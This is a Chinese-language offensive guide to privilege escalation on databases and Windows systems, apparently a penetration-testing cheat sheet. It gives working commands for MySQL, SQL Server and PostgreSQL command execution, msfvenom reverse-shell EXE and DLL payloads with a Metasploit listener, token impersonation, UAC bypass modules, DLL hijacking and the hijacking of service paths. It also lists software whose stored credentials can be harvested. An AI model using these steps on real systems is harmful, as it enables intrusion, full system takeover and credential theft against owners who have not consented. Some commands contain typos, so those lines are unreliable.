数据库与系统提权技术全面指南

一、数据库提权技术

1. 数据库提权流程概述

1. 获取数据库用户密码途径：

   • 网站SQL注入漏洞
   • 数据库存储文件或备份文件
   • 网站应用源码中的数据库配置文件
   • 工具或脚本爆破(需解决外联问题)

2. 连接数据库工具：

   • MDUT (命令行工具)
   • DatabaseTools (图形化工具)
   • Navicat (商业数据库管理工具)

2. 各数据库提权技术详解

MySQL提权 (端口3306)

开启外联命令：

GRANT ALL PRIVILEGES ON *.* TO '账号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;
FLUSH PRIVILEGES;

提权条件与技术：

• 条件：ROOT密码且secure-file-priv参数未严格限制
• 技术：
  • UDF提权
  • MOF启动项提权
  • 反弹shell

secure-file-priv参数影响：

• NULL：完全禁用文件操作
• 空字符串：无限制(最不安全)
• 指定目录：只能在指定目录操作

SQL Server提权 (端口1433)

开启外联命令：

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries',1;
RECONFIGURE;

提权条件与技术：

• 条件：sa密码
• 技术：
  • xp_cmdshell
  • sp_oacreate
  • CLR沙盒

PostgreSQL提权 (端口5432)

提权命令：

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output test);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

利用条件：

• 版本9-12存在CVE-2019-9193漏洞

Redis提权 (端口6379)

提权技术：

• 通过未授权访问
• 写入SSH密钥
• 计划任务执行
• 反弹shell

安装命令：

wget http://download.redis.io/releases/redis-2.8.17.tar.gz
tar xzf redis-2.8.17.tar.gz
cd redis-2.8.17
make
cd src/
redis-server

Memcache提权 (端口11211)

特点：

• 常用key-value缓存系统
• 默认无权限控制模块
• 可直接读取敏感信息

操作命令：

systemctl restart memcache  # 开启
systemctl stop memcache     # 关闭

3. 代理技术在数据库提权中的应用

场景：

• 攻击机：192.168.1.10
• A服务器：192.168.1.100(外网出口)/192.168.2.100(内网入口)
• B服务器：192.168.2.200(内网MSSQL服务器)

解决方案：

1. 在A服务器上设置代理
2. 攻击机工具连接代理
3. 代理连接目标服务器
4. 实现本地化连接效果

二、第三方软件提权技术

1. 常见提权软件分类

1. 远程控制软件：

   • Teamviewer
   • 向日葵
   • ToDesk
   • VPC
   • Radmin

2. 密码管理软件：

   • 浏览器密码存储
   • Xshell
   • Navicat

3. 服务类软件：

   • FileZilla
   • Serv-u
   • Zend

4. 文档类软件：

   • WinRAR (CVE漏洞)
   • WPS Office

2. 典型提权案例

1. Teamviewer提权：

   • 计算机用户权限 → 系统权限

2. Navicat Premium提权：

   • 使用taotie插件从普通用户提权至administrator

3. WinRAR提权：

   • 利用CVE-2023-38831漏洞

4. 浏览器密码凭据提权：

   • 获取保存的密码进行横向移动

三、Windows系统提权技术

1. 服务启动提权

SC服务启动

sc Create syscmd binPath= "c:\msf.exe"
sc start syscmd

PsExec服务启动

psexec.exe -accepteula -s -i -d cmd

2. 进程注入技术

MSF操作流程：

1. 生成payload：

   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o msf64.exe
   

2. 监听设置：

   use exploit/multi/handler
   set payload windows/x64/meterpreter/reverse_tcp
   set lhost IP
   set lport 4444
   exploit
   

3. 进程迁移：

   ps
   migrate PID
   getsystem
   

CS操作流程：

1. 查看进程列表
2. 选择目标进程注入
3. 使用getsystem提权

3. 令牌窃取技术

MSF操作：

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

CS操作：

• stral_token PID：直接窃取令牌
• spawnu PID：生成新进程窃取令牌

4. UAC绕过技术

MSF模块：

use exploit/windows/local/ask       # 钓鱼式
use exploit/windows/local/bypassua  # Win7
use exploit/windows/local/bypassuac_sluihijack    # Win10/11
use exploit/windows/local/bypassuac_slienrcleanup # Win10/11

UACME工具：

Akagi64.exe 编号 执行文件
Akagi64.exe 41 msf.exe

5. DLL劫持技术

实施步骤：

1. 信息收集：查找目标应用程序
2. 进程调试：分析调用的DLL
   • 工具：火绒剑HRSword、ChkDllHijack
3. 制作恶意DLL：

   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f dll -o x.dll
   

4. 替换原始DLL
5. 等待应用程序执行

DLL搜索顺序：

1. 应用程序加载目录
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. 当前工作目录
6. PATH环境变量目录

6. 不带引号服务路径提权

检测命令：

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

利用方法：

1. 查找不带引号的服务路径
2. 在空格前的路径位置上传恶意可执行文件
3. 等待服务启动执行

7. 不安全的服务权限提权

检测命令：

accesschk.exe -uwcqv "用户名" *

修改服务路径：

sc config "服务名" binpath="恶意路径"
sc start 服务名

四、综合检测工具

WinPEAS工具：

winPEAS.bat > result.txt
winPEASant.exe log=result.txt

五、内网域概念与提权意义

1. 为什么需要提权：

   • Administrator无法与域通信
   • System权限可以挣脱域控管理
   • 获取域用户信息：

     net user /domain
     

2. 为什么需要降权：

   • 某些漏洞攻击需要低权限
   • 高权限可能无法触发特定漏洞
   • 实现与域内机器通信

3. 域环境通讯原理：

   • 域控管理通讯
   • System权限不受本地管理限制
   • 普通用户权限受域控管理限制

六、实战注意事项

1. 数据库提权：

   • 注意secure-file-priv参数限制
   • 优先尝试开启外联
   • 不同数据库使用专用提权技术

2. 系统提权：

   • 根据系统版本选择合适方法
   • 注意权限继承关系
   • 多尝试不同提权路径

3. 工具使用：

   • MSF与CS各有优势
   • 善用UACME等综合工具
   • 自动化检测工具辅助

本指南涵盖了从数据库到系统层面的各类提权技术，包括原理、实施步骤和实战技巧。在实际应用中，需要根据目标环境灵活选择合适的方法，并注意权限的继承与转换关系。